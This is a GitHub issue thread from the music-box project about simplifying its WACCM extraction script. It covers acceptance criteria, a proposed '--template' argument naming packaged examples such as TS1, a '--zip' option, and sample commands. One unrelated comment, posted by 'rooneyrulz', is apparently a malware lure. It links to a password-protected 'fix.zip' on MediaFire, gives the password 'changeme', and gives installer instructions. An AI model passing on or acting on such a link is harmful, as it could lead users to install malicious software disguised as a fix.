### ISSUE TITLE
Simplify WACCM extraction

### ISSUE THREAD

**Issue by K20shores** [NCAR/music-box#216]
With #214, TS1 files will be included with the install of music box

**Acceptance criteria**
- Extracting waccm does not require the user to provide the configuration file, only the name of one of the packaged examples.
  - This is for a demo, and changing the mechanism is easiest on the website. Let's make the demo as easy as possible.
- The output configuration is placed in the current directory in a folder called configuration
  - The server expects a zipped folder to contain the name configuration. Until we remove this requirement, we must enforce this
- A command line option `--zip` is added to the script so that the output will be a zipped file rather than just a directory
- Extraneous files are not included in the output. Right now, there's an extra json file which gets included that shouldn't
- The initial conditions file only contains photolysis rates. If we get surface reaction initial conditions working, we can add them

**Ideas**
For the waccm script, we should the TS1 configuration packaged with music box to make things simpler for people. Instead of providing a template, as a path to a configuration, consider changing the template argument to be one of the provided examples. Then the waccm script would be able to make a configuration for any of our examples that have matching species in waccm, not just TS1.

A suggested pattern to call the tools

```
waccmToMusicBox -d waccm/data/path  --date "20240301" --time "07:00" --latitude 3.1 --longitude 101.7 --template TS1
waccmToMusicBox -d waccm/data/path  --date "20240301" --time "07:00" --latitude 3.1 --longitude 101.7 --template Chapman
waccmToMusicBox -d waccm/data/path  --date "20240301" --time "07:00" --latitude 3.1 --longitude 101.7 --template CB5

waccmToMusicBox -d waccm/data/path  --date "20240301" --time "07:00" --latitude 3.1 --longitude 101.7 --template TS1 --zip
```

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by K20shores** [comment]
Closed by #231
